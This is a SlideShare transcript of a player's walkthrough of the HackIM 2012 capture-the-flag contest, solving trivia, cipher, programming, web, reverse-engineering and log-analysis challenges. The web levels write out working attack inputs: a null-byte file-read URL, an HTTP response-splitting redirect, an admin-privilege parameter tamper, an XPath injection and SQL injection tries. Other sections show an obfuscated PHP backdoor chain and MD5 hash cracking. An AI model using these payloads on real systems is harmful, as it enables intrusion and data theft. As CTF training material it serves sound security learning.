Your SlideShare is downloading. ×
HackIM 2012 CTF Walkthrough
Upcoming SlideShare
Loading in...5
×

Thanks for flagging this SlideShare!

Oops! An error has occurred.

×

Saving this for later?

Get the SlideShare app to save on your phone or tablet. Read anywhere, anytime - even offline.

Text the download link to your phone

Standard text messaging rates apply

HackIM 2012 CTF Walkthrough

14,211
views

Published on

HackIM 2012 CTF WalkThrough

HackIM 2012 CTF WalkThrough

Published in: Technology

3 Comments
1 Like
Statistics
Notes
No Downloads
Views
Total Views
14,211
On Slideshare
0
From Embeds
0
Number of Embeds
3
Actions
Shares
0
Downloads
210
Comments
3
Likes
1
Embeds 0
No embeds

Report content
Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
No notes for slide

Transcript

  • 1. My Acknowledgement To: Anant Shrivastava (infinity), Prashant KV (kvbhai), Dhanesh K (danny), Riyaz Walikar (karniv0re), Murtuja Bharmal (void), Aseem Jakhar (@),Rahul Sasi (FB1H2S), Pardhasaradhi CH (pardhu), Chaithu Rk (Antagonist), Amol Naik (AMol NAik), Prince Boonlia (boonlia), Atul Alex Cherian (Aodrulez), Pushkar Pashupat (push), Abhisek Datta (adatta), Ajit Hatti (adh), Bipin Upadhyay (om), Hemanshu Asolia (h3m4n), Shannon Morse (snubs) & Team from Hak5 - Trust Your Technolust
  • 2. Few cheeky lines that will gear up the CTF thrill: - Kitne level the, 35 sardaar. - A computer, plenty of time, lots of patience and a challenging CTF, what else does a hacker need to be happy? - Dont cry at the beginning of the CTF. Cry at the end of the CTF. - Unfortunately, no one can be told what the CTF is. You have to see it for yourself - I know why youre playing CTF, Neo. I know what youve been doing... why you hardly sleep, why you live alone and why night after night, you sit by your computer. Youre looking for the flag. I know because I was once looking for the same thing. I was looking for an answer. Its the question that drives us, Neo. Its the question that brought you here. You know the question, just as I did.Before everything else, A word, in fact a request: Kindly avoid goingthrough this writeup before you have attempted with your wildestidea, your weird assumptions, your hottest tools, craziest Einstein’sformula, or a logic that never fails.Brief Overview of CTF Layout:CTF was divided into 7 sections, each with 5 levels of challenges. 1. Trivia Levels: Brain-teasers/Riddles 2. Crypto Levels: Mystified ciphers/Substitutions. 3. Programming Levels: Mathematical logic/Hash Cracking. 4. Web Levels: Redirection/ Injection. 5. Reverse Engineering Levels: PE /Apk/Memory Dump. 6. Log Analysis: Analyzing, pcap/scanner generated logs. 7. Forensics Level: Incident Analysis
  • 3. Trivia LevelsTrivia Level 1Official Hint: N/APage Source: Nothing InterestingDescription: This operating system also refers to a 1982 science fiction film, a board game, anda song off the Prodigy B-Side "What Evil Lurks"Analysis: A quick Google search with the keyword “scifi movie list 1982” revealed android asthe first result.Flag: androidTrivia Level 2Official Hint: N/APage Source: Nothing InterestingDescription: This fictional IPv4 packet header field was proposed in RFC 3514 as a means foridentifying packets with malicious intent.Analysis: Google search with the keyword “fictional IPv4 packet header field” revealed the flag.Flag: evil bitTrivia Level 3Official Hint: N/APage Source: Nothing InterestingDescription: This humorous RFC of the Internet Engineering Task Force describes acommunication and control protocol suite designed for allowing infinite numbers of monkeyswith infinite numbers of typewriters to produce the entire works of William Shakespeare.Analysis: Google search with the keyword “communication and control protocol suite designedfor allowing infinite numbers of monkeys” revealed the flag.Flag: RFC 2795
  • 4. Trivia Level 4Official Hint: N/APage Source: Nothing InterestingDescription: Metasploit was originally coded for what purpose?Analysis: I can remember going through the book “Metasploit Toolkit” where it was mentionedthat metasploit was originally started as a network security game.Flag: gameTrivia Level 5Official Hint: N/APage Source: Nothing InterestingDescription: Released on April 1st 2003, this esoteric programming language uses spaces, tabsand linefeeds to compose commands.Analysis: Google search with the keyword “April 1st 2003 programming language” revealed theflag as whitespace.Flag: whitespace Crypto LevelsCrypto Level 1: Ulta PultaOfficial Hint: poiuytPage Source: <! -- <img src="http://www.instablogsimages.com/images/2009/09/14/recycled-keyboard-computer-mirror1_VXLbh_24429.jpg"> -->Description: Oexjwok -333 lauiljt bwxylexk hilyruik krbf lk yfi frzlx jekbeqaexi bwzqwxixy.ofiui yfi QB blx kixj lx iaibyueb kfwbs yfuwrgf yfi sitcwluj eh yfi frzlx jwik kwziyfexg yfly jwikxwy qailki Oexjwok, 2 Ceaa GlyikAnalysis: The page source revealed the image of keyboard mirrored. Observing carefully eachcharacter in the given string with the keyboard by mapping right side with the left and vice versa.Flag was revealed.
  • 5. Keyboard Mapping:3 == 0- == 2. == ,q == pa == lz == mFlag: Windows 2000 already contains features such as the human discipline component,where the PC can send an electric shock through the keyboard if the human doessomething that does not please Windows. - Bill GatesCrypto Level 2: White NoiseOfficial Hint: Follow the White Rabbit: P (by spnow)Page Source :<! -- md5sum: b80a5ce8b0c6c57a0258f34dd5905970 -->Description: shhhkoinahihaiAnalysis:First Attempt (leet way):I went through the wikipedia about Whitespace (programming Language) and got and idea thatthe given whitespace contains tabs and space which must be replaced by 1 and 0. 1. Copied the whitespace to gedit (text editor). 2. Replaced the tabs with 1 and space with 0. 3. Got the following sequence of 0’s and 1’s
  • 6. 4. Now, this binary sequence needs to be converted into something meaningful, therefore , I google for “binary to text translator” and got an online tool at http://home.paulschou.net/tools/xlate/ 5. Translated the binary sequence but to my surprise, I couldn’t get any meaningful information  Where did I have it wrong?Second Attempt (leet way): 6. After I thought, came to conclude, how about replacing tabs with 0 and space with 1? 7. There, got a new sequence, with expectations. 8. Again I used the same binary to text translator, and Voila!!! There was our Flag
  • 7. Alternate Method:The above method seems to require lots of hard work precisely.Thus, we can even solve the above problem with this alternate way: 1. Copy the whitespace to gedit (text editor) and save it. 2. In linux there is a utility called as “tr” utility to translate characters. 3. Type : cat whitespace.txt | tr "t " "01" at terminal.(Note:there is space after t) 4. There is our binary sequence; again we can copy it up in the binary to text translator to get the flag.Flag: Error Message: Your Password Must Be at Least 18770 Characters and CannotRepeat Any of Your Previous 30689 Passwords - MS KB 276304Crypto Level 3: The Base TestOfficial Hint: http://lmgtfy.com/?q=RFC+for+base+encodingPage Source: ====5JP2T6UH5JR4UKRJSZTOEEJKN2TYUMFLXKUMFHJJTJVWULRIGSTGFCZKWZVEDJVJ====Description: N/AAnalysis: I went through RFC 4648 twice, but didn’t find anything highly influencing that couldeventually get me to the flag. However got a very basic idea about the patterns of various typesof base encodings.My assumption on the given string was: - Rot-13 - Reverse - Base64 - Base32
  • 8. Went past through combinations of several of the above assumptions, and finally got the flagwith the following steps: 1. Remove = from both the ends of the given string. 2. Reverse the string. “JVJDEVZWKZCFGTSGIRLUWVJTJJHFMUKXLFMUYT2NKJEEOTZSJRK U4RJ5HU6T2PJ5” 3. Apply base32 decoding “MR2W6VDSNFDWKU3JNVQWYYLOMRHGO2LUNE======” 4. Again apply base32 decoding with the result on Step 3 , to get the flag. To reverse the text: http://textmechanic.com/Reverse-Text-Generator.html To decode base 32 :http://online-calculators.appspot.com/base32/Flag: duoTriGeSimalandNgitiCrypto Level 4: ElucidateOfficial Hint: N/APage Source :<! -- md5sum: ad4e2705406ef1197f03f93474e30020 -->Description: ElucidateAnalysis: Nothing seems to be better than sleeping rather than go on decoding those obfuscatedphp script. The first laziest thing that I decided to do was to look for an online tool that would dothe job without requiring going through several decoding steps.Eventually I came across an online tool:http://www.whitefirdesign.com/resources/unobfuscate-php-hack-code.htmlNow back to analysis part again. Let us understand the script in part wise:<? php$vaa8089358f2="x62141x73145x3664x5f144x65143x6f144x65";@eval($vaa8089358f2 ("**base 64 encoded string**"));?> - On the first line, a variable is being set to a string that’s being represented by a mix ofhexadecimal (‘x’) and octal (‘’) escape sequences. Python uses the same escapes as PHP forhex and octal, so it’s easy to use python shell to see a “normalized” ASCII representation ofthese strings:Python Shell Below:>>> "x62141x73145x3664x5f144x65143x6f144x65"base64_decode
  • 9. - Next idea was to decode the base64 encoded string. - I used the online tool mentioned above and got an unformatted php script. - A quick Google search revealed that there was a php formatter at “http://www.prettyprinter.de” - So by this time I had decoded the base 64 encoded string with proper formatting. - On further analysis found another obfuscated script: @eval($w67426c2c6071d5516d2011022955d36($d9917ccba06ba0e3ed151e1b9461ae76($xaa4294a0bca922b2cc 8b9a2789e95fa("yIIgnkcORC4eT5SRD0cho3s2WqMVXWozH4hRSSXY7B0YBDtdngd0cs+9f96rZnyjS/jj7hmZZ 8+87M2sTxT1NWZoRJljzDMMXNUXppQ/rLQG89Uy+9UlsxyVrWmoGozLR7ilMhAai8gyemgw0aVKsNMFMeo j3UOjhsR6TP2Z4WVZvIzgmX9r/6j7l6mw1agjlawTPb9kZk08qlP08gXt8pxW2txJNVWt1uyqrZoOHyAjLA4Xd6la nOsZj9e3lE9Fuy4bU/mZC5KemoeKUXECwb/WHKBDPY7lz8sIiNb2VU9Wq+MfSvwmzzxnphJxlvz3XtCOsSRL mc/mUHEd5KcJUMfe1L8OjjXYn+/oSAnfxD7jKTxVNLWEmuLDzZL7omK1VavnU6kDb1C0nx7123qZguxg1v3+ xVMqCZ43iJoxENOxGzaOAA5zDFxXwzMZOthn+4XYQZCC/H9lIl6iIin+/BSG0Mf9310hya7rLywnQBBV3S1/h Mc8+UE9B764+Uj7aalqKA+ZlpHY/LsW+Bcz3PqUjlUMeO79bsS67a7wzYKhscgvTBp+4bF0TV2mSxTeEJzBnu8 J623YhwZrQTZf94R5de1JCTAXpfLY5KVyIrk0M/bxjcFPDTzaISXHrMXb5/a0FGXHtOY1VgecMP/kmSRdCAAx k/ojrAVaJrfy+bSRPFu5MIsw1UT2RiRRIYmvsGkUC+Fj8ks5Uu76Nni47+ARaclzp4jQFIY0MkIrUFslxscIUvmcV qaeINrbpVI/unqFCWUlwirlfd9krZYM+r3k2gLeF/nv4uUmSP7Sf8/8EA0KyhkGsI7HZ/fsQ2QiGQhQ3p687p2CZ +yklj4fKEmJcfq2JQ3vaqGGBwsxkhu0F81tXcT67WlED2M5BmZ2eDq2dkLqMC6z720S66eSxPLAAunJ1jgEAKN 737geMYA9xjMxqCxC")))); - And there was another base 64 encoded string inside it. - Now the online tool comes into play. The above script is of the form: - @eval(gzinflate(base64_decode(str_rot13("base64_encoded”)))); - The output revealed some kind of bot net behavior, however at this point I was least bother about this fact, and kept on observing it. - A quick overview of the output attracted me with following variable: - $_4fa3332ef3d19e9840387434b8d28780 = "x6f156x6c171x62171x6f142x73145x72166x69156x67164x68151x73143 x6f156x64151x74151x6f156x77157x75154x64164x68145x72145x73165x 6c164x73157x66157x75162x77157x72153x62145x72145x67141x72144x 65144x61163x66165x6c154x79143x6f156x63154x75163x69166x65141x6 e144x61163x68141x76151x6e147x65154x75143x69144x61164x65144x74 150x65156x6f162x6d141x6c143x6f165x72163x65157x66164x68145x701 50x65156x6f155x65156x61"; - Hoping this would be the final step, I used the python shell, In case if anyone doesn’t have python installed, Google App Engine for python would really be helpful at http://shell.appspot.com/ , or may be there can be multiple ways to decode that >>>"x6f156x6c171x62171x6f142x73145x72166x69156x67164x68151x73143x6f156x64151x74151x6f156x77157x75154x64164x68145x72145x73165x6c164x73157x66157x75162x77157x72153x62145x72145x67141x72144x65144x61163x66165x6c154x79143x6f156x63154x75163x69166x65141x6e144x61163x68141x76151x6e147x65154x75143x69144x61164x65144x74150x65156x6f162x6d141x6c143x6f165x72163x65157x66164x68145x70150x65156x6f155x65156x61";onlybyobservingthisconditionwouldtheresultsofourworkberegardedasfullyconclusiveandashavingelucidatedthenormalcourseofthephenomena
  • 10. Flag:onlybyobservingthisconditionwouldtheresultsofourworkberegardedasfullyconclusiveandashavingelucidatedthenormalcourseofthephenomenaCrypto Level 5: Yeah! As you guessed, it’s SteganographyOfficial Hint: Yeah! As you guessed, it’s SteganographyPage Source :<!--Hs Foe vhmmhng un!qrdvdot!Ewhl!btu!nou!@ble> Thdn!id!hr NOUOmoipouenu/!Hs!Id!@ble- cuu!NNU vhllhof>!Thdn!Id!hr!Lamdvoldnu/ Hs Id Cnth @bmeand!Vimliog> Tidn Vhdobe Bnldui Ewhl>!Ir hd!Neitidr!@cmd!OorVillhnf>!Tidn!WHY!ball!him FOE? -!Dqhbtrusongnd-->Description: Llun Saving Bank is fed up with known encryption standards to store the data.They decided to reinvent the wheel. Can you decode the data?Analysis: Close looks with the initials of title “Llun Saving Bank” suggest LSB. I didn’t knowmuch about LSB encoding technique in text; however I have come across one with image insome war-game. I had a look over LSB on wikipedia and got an idea to include the rightmost bitof each character. I converted the given text into binary and whoa, I was left with long list ofbinary. This was a real challenging job to get the rightmost bit. Therefore a simple python scriptmade my task easier:result = ciphertext = <paste binary here>for i in range(7, len(ciphertext), 8): result += ciphertext[i]print resultNote: My python script assumes the binary with space between each word. Something like“01001000 01110011 00100000…….” And so on.On executing the python script, I was able to get the LSB of each character to which I convertedto ASCII using http://home.paulschou.net/tools/xlate/, and there was our flag in plain text.Flag: Learn howto Hide in Plain Sight
  • 11. Programming LevelsProgramming Level 1: ROTOMATAOfficial Hint: N/APage Source :<! -- We only know the first 6 characters: "Men at" -->Description: Mfp ey zwvo fvat rjx hwprdrr lb nawzh tnfpc: Anj icvlu, hjgy Kbffhg, zk hjp gmnso nntjj, phf sw vawwhnwer, pcum nu oeq ewllxqmqitAnalysis: I really didn’t spend much time on decoding the whole string. Rather analyzed thedifference between first three words, and then google for it.M-M=0e-f=1n-p=2space=3a-e=4t-y=5space=6s-z=7o-w=8m-v=9e-o=10Hence, the first three words, that I obtained was “Men at some”. After I google it, I got thefamous quote by William Shakespeare, which was the flag.Flag: Men at some time are masters of their fates: The fault, dear Brutus, is not in ourstars, but in ourselves, that we are underlings
  • 12. Programming Level 2: Pascal’s TriangleOfficial Hint: N/APage Source :<! -- ex: The sum of all middle terms till first 6 rows is 9 -->Description: The Flag is the sum of all middle terms till first 1337 rows of Pascals TriangleAnalysis: This seemed to be easy at first sight. My first expectation was to get some cooked upcode but that really didn’t worked out, to hell all I got was algorithms and some frustrated guylike me crying on the discussion forums to get their erroneous triangle code worked out. GoogledPascal triangle went through wikipedia about Pascal triangle, wolframalpha- Pascal triangle,Frustration takes you at any height of paranormal activities. After spidering and crawling throughthe links, came across some useful resources:http://rosettacode.org/wiki/Pascals_trianglehttp://www.mathsisfun.com/pascals-triangle.htmlhttp://www.mathwords.com/b/binomial_coefficients_pascal.htmhttp://www.youtube.com/watch?v=OMr9ZF1jgNc-. So all up, time to do some serious coding.- The challenge considers the middle term of odd rows.- Wrote a code on c and hoped it would worked out, failed - Looked for some java code, compiled successfully, but when I executed it, I was staring on myLCD, the program went on running for more than 30 seconds on my i5, that was stack overflow.- Time for some manual again, overlooked and realized that binomial coefficients can beessential to get me the flag.- Worked out again for the 3rd time now in python, with unexpected hope, executed it gotsomething, and voila!!! that was the flag,This was the python script:#!/usr/bin/pythonfrom math import factorialp=0s=0for n in range(0, 1337, 2): s += factorial(n)/(factorial(p)*(factorial(n-p))) p += 1print sFlag:43659324741884237070936006832303643114239411987772786602066543431205872166674362332393596312576719064242547970040323267566530343333103970820072593578706234276624324605878186670972267056459871456566594569343564988621600326286475080697865518622537377534356455651048425097523734881838663157063304671110082383218294453737678744221560158357896856330703194356882895482874383651576271102847866170999680296497
  • 13. Programming Level 3: Your Brainfuck Sir...Official Hint: N/APage Source :<! -- md5sum: 4f1ec9481c0f0ae0a199ea5c8dedf62d -->Description: Debug bfcode to get the flagAnalysis: I had encountered brainfuck earlier but never this way. A Google search for brainfuckinterpreter resulted in http://www.iamcal.com/misc/bf_debug/ . Executed the given code withoutany input in the interpreter and observed the result. Something appeared partially which doesn’tseem to throw any useful meaning. Tried with some random input and got the same output againand again. May be defect with the interpreter, LOL. It’s MANUAL time now.Glanced across the lines in wikipedia about the brainfuck programming. There I got to see thesmall “Hello World” program. I executed it in the interpreter, and got the output successfully.Observed the “Hello World” in brainfuck where each line was ending with a period. Period has aspecial meaning in brainfuck programming. It is same as print statement which the givenbrainfuck code was missing.GOT IT!!! So appending a period at the end of each line was allabout getting the flag.Flag: ...In fact, never ever use gets() or sprintf(), period. If you do we will send evil dwarfsafter you..Programming Level 4: Substitute ProblemOfficial Hint: N/APage Source :<! -- md5sum: 31178aa23ef43566009d97f38a470279 -->Description: deobfusAnalysis: There wasn’t much to do with this; everything was self explanatory in the page itself.The only thing required with this challenge was plenty of time with lots of concentration.For me,It nearly took continuous 2 hours to get through all the iteration. Probably some hardcoreprogrammer would have written a simple code to get it done in few seconds. So mine timecomplexity with this problem was exponentially equivalent to one with the programmer’s.Final iteration revealed the code as:SEDULoUSLY ESCHEw oBFUSCAToRY HYPERVERBoSITY AN D P R o L I X I T Y 8 4 R o E D Y GREENOn attempt with variation of case, got the final flag.Flag: sedulously eschew obfuscatory hyperverbosity and prolixity 84 roedy green
  • 14. Programming Level 5Official Hint: N/APage Source: Nothing InterestingDescription: A pinch of salt for your coffee, Sir?Analysis: I’m really bad at brute forcing and guessing un-natural passwords. With hope to get itcorrect this time, I went to salt.asp page and generated hash for few random keywords. Sorrywouldn’t share those, crazy ones, nearly killed my system with overheating: DThe basic idea was to crack the hash and identify the salt which was the flag to complete thischallenge. I looked around for the md5 cracker and got one at http://3.14.by/en/md5. Next i triedto crack the hash for the random keywords. After a while, my system temperature went abovecritical level and had to shutdown the process, that was really disgusting job to watch over theLCD and wait for the cracker to do its job, the cracker doesn’t seems to understand that mysystem is not a blade server or may be I don’t. On a final note, I decided to take hash for eithersingle word or digit and crack it. Again the same boring task, at first set I generated the hashfrom 0-10, and finally on second attempt with the hash for “1” I got my flag.Working Steps: 1. On the page salt.asp input password as 1. 2. The hash thus generated for my system was “243dc4f11700aa3bd6c7de312bb0ca31” (Note: each system will generate a unique hash). 3. Fire up the windows console , and type the following at the command prompt: barswf_cuda_x32.exe -h 243dc4f11700aa3bd6c7de312bb0ca31 -c 0a 4. After approx 2 minutes on my i5, the cracker successfully displayed the result.
  • 15. 5. There we had our key as : “1c183e7” 6. That means "1" + "salt("c183e7"). Since hash = Algo(password+salt) 7. In the given problem, 243dc4f11700aa3bd6c7de312bb0ca31=md5(1+c183e7) 8. And finally my flag was c183e7( Note: Each system will have a unique flag)Flag: c183e7 Web levelsWeb Level 1Official Hint: N/APage Source: Nothing InterestingDescription: Can you view the bytes in password.asp from Me?Analysis: As the description suggests, it was null byte injection. I had come across a problem onnull byte on one of the wargame.Let’s understand the problem. Our challenge was to read theinformation from the file password.asp which somehow was protected by the server. Here wecan observe in the given URL that default parameter is test.txt, Multiple questions can arise here,as such, why only test.txt as the parameter? If you dont do anything with a parameter, why takeone? Assume a real time application from my perspective, the idea with this level is that: Wehave an application which takes a filename from us, reads it, and shows it to us. We found anexample of input, "test.txt".We know there is sensitive information in password.asp, But we cantget password.asp. So lets imagine that whoever wrote this application which reads any file wetell it to, wanted to keep us from reading anything but files which end in ".txt".So any inputwhich we give it that doesnt end in ".txt" is rejected. So heres the problem: How do we get a filewhich ends in ".asp" when the filename we provide has to end in ".txt"?The answer obviously is null byte but that would be a partial answer in the context of thequestion “HOW?” In languages like ASP and PHP, the null byte doesnt end a string, it’s justanother character. In C-based languages (C, C++, C#) a null byte means the end of a string. So ifwe give a PHP script a filename to open that has a null byte, its different in PHP and in the OS.So the filename might be "hello%00blah" to PHP. But it would be "hello" to the operatingsystem. Some applications append a file extension to the end of any filename we give them. Sowe give them "hello" and they open "hello.txt" .Which is why we do “hello.php%00”. BecausePHP sees "hello.php%00.txt" and the OS sees "hello.php".And after this long boring, worthless explanation, hence the flag.Flag: http://www.nullcon.net/challenge/wlevel-1-proc.asp?input=password.asp%00.txt
  • 16. Web Level 2:Official Hint: Judgment of SolomonPage Source: Nothing InterestingDescription: Can you redirect ME to hackim.null.co.in?Analysis: I had to go through the hint to get this one done. After few attempts with variation ofparameters, arbitrarily I had to go through the boring story on wikipedia. The summary of storywas, “Solomon suggested that the baby be split in half and each half given to one of the womenclaiming to be the mother”. So, the hint refers to the word "split". On quick search with the string“HTTP Splitting” returned several results. Studied few of them, showing various PoC’s andrealized that I had spent most of my time injecting the http response rather than redirecting it.Hence finally I got the level done with several parameter variations.Flag: http://www.nullcon.net/challenge/wlevel-2-proc.asp?page=%0d%0aHTTP/1.0%20302%20Found%0d%0aLocation:%20hackim.null.co.in===========================================================================================Web Level 3:Official Hint: Proxies are golden friendsPage Source :<! -- If youre still reading, better register Mate :)-->Description: Click here to Login || Click here to RegisterAnalysis: In this level we were entertained with two options, register and login.I clicked on bothof them and went through the page source, nothing seemed interesting. Had a thought that itcould be vulnerable to some kind of injection. On next step I filled up the form and register,Wow my registration my successful, didn’t expected though.But on login with those credentialsall I got was an error message “Only ADMINS are Welcome!”.Came back again on theregistration page and tried with another input. There I observed the page source, and cool therewe had something interesting this time, in this format:<!--Debug Info: INSERT uname|pass|uname|uname@localhost.com|admin:no|comment:newuser INTO USER DB FILE -->So, it was all here, the parameter with admin:no was passed into the database. Now there was notmuch to do, next I used burp suite to check how the parameter were passed.
  • 17. On the last line we can observe inside the window how parameters are passed to the server. Thisformat was similar to earlier as what we got on the post registration page source. So all we had todo was add admin:yes as per the format. Even this process annoyed me a lot, since on singleattempt I couldn’t get it correct.So, the correct format was:username=me.admin&name=admin&password=admin&email=admin%40localhost.com|admin:yes&Submit=RegisterAnd finally I registered myself as the admin, and got the flag.Flag: b3149ecea4628efd23d2f86e5a723472
  • 18. Web Level 4: Can You Get Me all the Data?Official Hint: if you think youve seen all the data, im afraid youre mistakenPage Source: Nothing InterestingDescription: 2007 && 2002Analysis: At the beginning of this level, I was getting no idea at all for what really was requiredwith it. After hovering with the links around for few hard hours, I got a cool link on OWASP:https://www.owasp.org/index.php/Interpreter_InjectionThere were few interesting attack vectors which foolishly I tried, in vain had no luck. I noticedthe description again and understood it was asking to reveal data from the server and then Irealized that blindly I tried with those injection parameters. On my next attempt I went onlooking for cheat sheet on various attack parameters. I collected few of them and studied those.Those were beyond my understandings. Helplessly shouted in the IRC and got some clue, cluewhich again required traversing blindly. Eventually I came across an article:http://palpapers.plynt.com/issues/2005Jul/xpath-injection/ which described xpath injection issimple understandable language and then a good cheatsheet over here:http://www.simple-talk.com/dotnet/.net-framework/xpath,-css,-dom-and-selenium-the-rosetta-stone/I tried with those attack vectors, and got the flag unexpectedly with this one: input=] | /* | /foo[bar=I completed this level blindly, a bad one.Flag: myworthinessisallmydoubthismeritallmyfearcontrastingwhichmyqualitydoeshoweverappearWeb Level 5:Official Hint: It’s SQLiPage Source: Nothing InterestingDescription: Do You Have What IT Takes to Break into the Worlds Most Secure LoginSystem?Analysis: The very first thing anyone would try out after looking at the page at one sight was thevery common SQL Injection (“ or 1=1--) and yes I was on the same side of the coin. As usual Iwas wrong again. Assuming it to be a blind SQLi, looked around www.1337day.com andwww.exploit-db.com in hope of getting some good papers. On the very first link of exploit-db Igot to see a paper on advanced blind sqli, went through it and there was some attack vectorsagainst web firewalls. With positive hope tried and with the second attempt using <>1 as theusername and password made it to the flag.Flag: 47c1b025fa18ea96c33fbb6718688c0f
  • 19. Reverse Engineering LevelsReverse Engineering 1: Basic TestOfficial Hint: N/APage Source: <!-- md5sum: 9d428bdcb07127ff4358f7d487445470 -->Description: justdoit.exeAnalysis: The given binary seemed to be suspicious. So before executing it I decided to analyzeand verify if it was safe to execute. I dumped the binary into hex editor and observed it. Theheaders showed that it was UPX packed. I unpacked it using “Universal Extractor” and wentthrough it again, no conclusion, finally executed it inside the vmbox and analyzed the behavior.At first instant I couldn’t get anything from it, executed it few more times and saw automationdone by the exe. Then I went to google and searched for the string “keyboard automation” andthere first option showed AutoHotKey.Eventually ended up looking for Exe2Ahk athttp://www.autohotkey.com/download/Exe2Ahk.exeAfter successful decompilation, found the flag in plain text.Flag: We could talk all day about what AutoHotKey can do for an online poker playerReverse Engineering 2: Ask nicely, it will give you what you wantOfficial Hint: Take another path.. in general look for interesting code blocks & execute them..code can be anywhere in the PE, even in data | Resource? No ResourcePage Source :<! -- md5sum: c786287c7825784a85413695a9e319fc -->Description: HackIM.exeAnalysis: I consider this as the most insane level in the whole CTF competition. Nearly spenttwo hacking days to get past through it. To understand the binary, I nearly downloaded all thetools found in google having the string “PE”, went through various articles on Reversing PE, andnothing worst than that shifted to 3 different debuggers one bye one. Ultimately after tracing theflow of program for several times in the Olly debugger, following steps concluded the flag: 1. As the hint was suggesting, “No Resource “, I loaded the PE into Resource Hacker to see if what exactly its meaning was. Encountered the following error.
  • 20. So it was clear from this error that, there was something wrong with the resource section.2. I turned up into Olly debugger, loaded the PE and went to the memory window (ALT+M).3. At offset 0040C000, there was the .rsrc (resource) section. I changed the access to the sectionfrom Read to Full Access. 4. Tried running the program but couldn’t get anything desired. Popped over the hint again and there it was asking to execute the resource section. 5. So now it was time to place the jump instruction somewhere so as to execute the resource section.Came back to CPU window (ALT+C). 6. Just below the program entry point, at offset 00401273 there was a JMP instruction.
  • 21. 7. So all I had to do was place the jump over the resource section which was the offset address 0040C000. 8. And finally running the program I got the flag in the messagebox.Flag: AreYouHappyNow?
  • 22. Reverse Engineering 3: null Mobile Android AppOfficial Hint: N/APage Source :<! -- md5sum: fd81ba87c0edc1f37250e680a49260d8 -->Description: We’re proud to announce the null Mobile Android App Project; however theapplication is currently in Beta Phase and requires lot of attention from the testers. In keepingwith the spirit of HackIM weve hidden a Flag inside. Your task is to find the Flag.Analysis: I didn’t have much hard time with this one as of before. I unpacked the apk file withWinrar and went through the contents. Inside folder res>raw there were two files code.js andjunk.php. The JavaScript inside code,js was in unformatted state. I formatted it usinghttp://www.jsbeautifier.org and went through it, couldn’t get anything interesting. Next openedthe junk.php file in Ultraedit and after a careful observation there at line 72 I got to see thepacked javascript function, finally an online tool at http://www.strictly-software.com/unpackerhelped me to unpack the javascript function, revealing the flag inside it.Flag: Do not let what you cannot do interfere with what you can do.Reverse Engineering 4Official Hint: we’ve updated the binary with hints, request all to download again to proceedPage Source:<! -- md5sum: 7c87b2bfe4e02dbb32e2c3067cb93692 --> <! -- <center><h3><a href="data/script">script</a></h3></center><! -- md5sum: 849f2d8c6e22604cba8fe4904803de10 -->Description: REL4 UPDATE: WE have updated the binary with some hints inbuilt, Request allto download new RE binary to proceed.Analysis: My first attempt with the given file was to analyze its type. I used the file identifiercalled TrID File Identifier also available online at http://mark0.net/onlinetrid.aspx. The resultshowed up that it was an ELF binary. So I cross verified it on the terminal:
  • 23. It showed up that the binary was stripped. Tried executing it and was entertained with thefollowing error.I tried with strace and ltrace command but couldn’t learn much from those outputs.The error indicated something about time machine, so I turned up in google and looked foranything interesting on time machine, however couldn’t find anything to help.The next thing I did was to change the system date to some back year. I changed it to year 2000.Tried executing the binary again, and voila there was no error but even no flag. Tried givingsome parameter but that too didn’t help anything. Next I opened the new terminal and triedlooking into the current processes running using the command ps –aux and got a long list. It wasdifficult to figure out so again tried filtering it using the command: ps –aux | grep script2 andwhoa, unexpectedly got to see the some shell script. Went through it, and there our flag was inplaintext.Flag: Nature has neither kernel nor shell; she is everything at onceReverse Engineering 5: Got Dumped :(Official Hint:Page Source :<! -- md5sum: 043e4cc85c519723fad18dce7502371c -->Description: lol.rarAnalysis: This challenge was about the crash dump analysis. I opened it in hex editor and wentthrough the few lines got an idea that it was a windows crash dump. Next I installed Windbgwith proper symbol configuration and loaded the dump into it.I was unaware of any suchanalysis and went through few links on google. Got some good information and few cheatsheets.Ultimately the following steps help me to understand the dump. 1. First we had to recognize the file that caused the crash. Command: !analyze –v showed u that stub.exe caused the crash. 2. Next we had to extract stub.exe from the dump to analyze it.So for this there is a sos which is used for .NET debugging( to dump dll and exe). 3. .load clr10sos.dll 4. !sam folder_location 5. Now we had stub.exe. Next I loaded the stub.exe into Olly dbg. Step into the instruction and realized that the jump was passing to the crash portion of the assembly. Tried to bypass it by jumping it to the messagebox function. I got the messagebox but there was no flag in it. Again went back to windbg and checked for the PID since there was a GetProcessID function in the assembly. I got the PID as 0xA60 then I patched the GetProcessID to return 0xA60 and finally got the flag.
  • 24. Flag: TheLastSamurai Log AnalysisLog Analysis 1: BasicOfficial Hint: N/APage Source :<! -- md5sum: 1e2612e8ff3d4651c7d5fc67f2797906 -->Description: reportAnalysis: In this challenge the log was not too large but took a long time to understand. Everyline had a cool piece of information. On carefully observing through the lines, I foundsomething very interesting on line number 31:+ OSVDB-3268: GET /challenge/logically_insane/ : Directory indexing is enabled:/challenge/logically_insane/Checked into it and wow found two files, but at the very next moment, realized that the game isstill on. Said “Ask the proper question to get the proper answer”. Went on the page source andgot some more closer to the flag, there was a hint given on comment:<!-- askmelater.asp?question=? -->And to my surprise with my very first guess, I got the flag. HAPPY!!!The final URL was:http://nullcon.net/challenge/logically_insane/askmelater.asp?question=flagFlag: 6bb61e3b7bce0931da574d19d1d82c88
  • 25. Log Analysis 2: Mystery PasswordOfficial Hint: N/APage Source: <!-- md5sum: 6eebd22df057377a436dad2d97fad8b6 -->Description: log3.pcapAnalysis: There wasn’t much in this challenge. The log was unexpectedly small and within fewminutes anyone could solve it. I opened the log in wireshark. The easiest way was to learn thelog was to see the TCP stream. Right Click on the log window > Follow TCP stream, popped upthe TCP stream window. The very last line of the stream content revealed the password and withnext few attempts I got the flag.Flag: ..Supp@..adm1n
